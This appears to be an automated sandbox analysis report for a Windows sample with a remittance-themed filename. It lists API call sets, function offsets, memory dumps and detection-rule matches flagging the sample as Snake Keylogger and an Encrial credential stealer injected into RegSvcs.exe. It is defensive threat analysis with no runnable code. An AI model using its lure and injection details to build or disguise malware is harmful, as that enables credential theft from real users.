                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_0047C81C

                  System Summary

                  barindex
                  Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000007.00000002.4560074410.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,6_2_004333BE
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004096A00_2_004096A0
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0042200C0_2_0042200C
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0041A2170_2_0041A217
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004122160_2_00412216
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0042435D0_2_0042435D
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004033C00_2_004033C0
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0044F4300_2_0044F430
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004125E80_2_004125E8
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0044663B0_2_0044663B
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004138010_2_00413801
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0042096F0_2_0042096F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004129D00_2_004129D0
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004119E30_2_004119E3
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0040FA100_2_0040FA10
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0044EB5F0_2_0044EB5F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00423C810_2_00423C81
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00411E780_2_00411E78
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00442E0C0_2_00442E0C
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00420EC00_2_00420EC0
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0044CF170_2_0044CF17
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00444FD20_2_00444FD2
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_03EC5A700_2_03EC5A70
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F49A482_2_03F49A48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246D2783_2_0246D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_024653623_2_02465362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246C1463_2_0246C146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246C7383_2_0246C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246C4723_2_0246C472
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246CA083_2_0246CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246E9883_2_0246E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_024669A03_2_024669A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02463E093_2_02463E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02466FC83_2_02466FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246CFAA3_2_0246CFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246CCD83_2_0246CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02469DE03_2_02469DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246F6313_2_0246F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246FA883_2_0246FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02463AA13_2_02463AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0246E97A3_2_0246E97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_024629EC3_2_024629EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06161E803_2_06161E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_061617A03_2_061617A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06169C183_2_06169C18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_061695483_2_06169548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06160B303_2_06160B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_061650283_2_06165028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_061629683_2_06162968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616DE003_2_0616DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06161E703_2_06161E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616E6B03_2_0616E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616E6AF3_2_0616E6AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616EF513_2_0616EF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616EF603_2_0616EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616178F3_2_0616178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616FC5F3_2_0616FC5F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616FC683_2_0616FC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616CC8F3_2_0616CC8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616CCA03_2_0616CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616D5503_2_0616D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616D5403_2_0616D540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616DDFF3_2_0616DDFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616E2583_2_0616E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616E24A3_2_0616E24A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616EAF83_2_0616EAF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616EB083_2_0616EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06160B203_2_06160B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_061693283_2_06169328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06168B903_2_06168B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616F3B83_2_0616F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06168BA03_2_06168BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616F8103_2_0616F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_061650183_2_06165018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616F8023_2_0616F802
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616003F3_2_0616003F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_061600403_2_06160040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616D0F83_2_0616D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616D0E93_2_0616D0E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616D9993_2_0616D999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0616D9A83_2_0616D9A8
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004096A06_2_004096A0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0042200C6_2_0042200C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0041A2176_2_0041A217
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004122166_2_00412216
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0042435D6_2_0042435D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004033C06_2_004033C0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044F4306_2_0044F430
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004125E86_2_004125E8
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044663B6_2_0044663B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004138016_2_00413801
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0042096F6_2_0042096F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004129D06_2_004129D0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004119E36_2_004119E3
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0041C9AE6_2_0041C9AE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0047EA6F6_2_0047EA6F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0040FA106_2_0040FA10
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044EB5F6_2_0044EB5F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00423C816_2_00423C81
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00411E786_2_00411E78
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00442E0C6_2_00442E0C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00420EC06_2_00420EC0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044CF176_2_0044CF17
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00444FD26_2_00444FD2
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F5A2B06_2_03F5A2B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCD2787_2_02BCD278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC53627_2_02BC5362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCC1467_2_02BCC146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCC7387_2_02BCC738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCC46F7_2_02BCC46F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCCA087_2_02BCCA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC69A07_2_02BC69A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCE9887_2_02BCE988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCCFA97_2_02BCCFA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC6FC87_2_02BC6FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCCCD87_2_02BCCCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC9DE07_2_02BC9DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCF6317_2_02BCF631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCFA887_2_02BCFA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC3A5A7_2_02BC3A5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC29EC7_2_02BC29EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BCE97A7_2_02BCE97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02BC3E097_2_02BC3E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_057695487_2_05769548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05769C187_2_05769C18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576E6B07_2_0576E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_057650287_2_05765028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576D5507_2_0576D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576D5407_2_0576D540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576DDF17_2_0576DDF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576FC687_2_0576FC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576CCA07_2_0576CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576CC8F7_2_0576CC8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576EF607_2_0576EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576EF517_2_0576EF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_057617A07_2_057617A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576178F7_2_0576178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05761E707_2_05761E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576DE007_2_0576DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576E6AF7_2_0576E6AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05761E807_2_05761E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_057629687_2_05762968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576295B7_2_0576295B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576D9A87_2_0576D9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_057600407_2_05760040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576F8107_2_0576F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_057650187_2_05765018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_057600077_2_05760007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576F8017_2_0576F801
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576D0F87_2_0576D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05760B307_2_05760B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05760B207_2_05760B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_057693287_2_05769328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576EB087_2_0576EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576F3B87_2_0576F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05768BA07_2_05768BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576F3A87_2_0576F3A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05768B907_2_05768B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576E2587_2_0576E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576E2497_2_0576E249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0576EAF87_2_0576EAF8
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: String function: 004115D7 appears 36 times
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: String function: 00416C70 appears 39 times
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: String function: 00445AE0 appears 55 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004115D7 appears 36 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00416C70 appears 39 times
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00445AE0 appears 55 times
                  Source: z84TTREMITTANCEUSD347_432_63.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
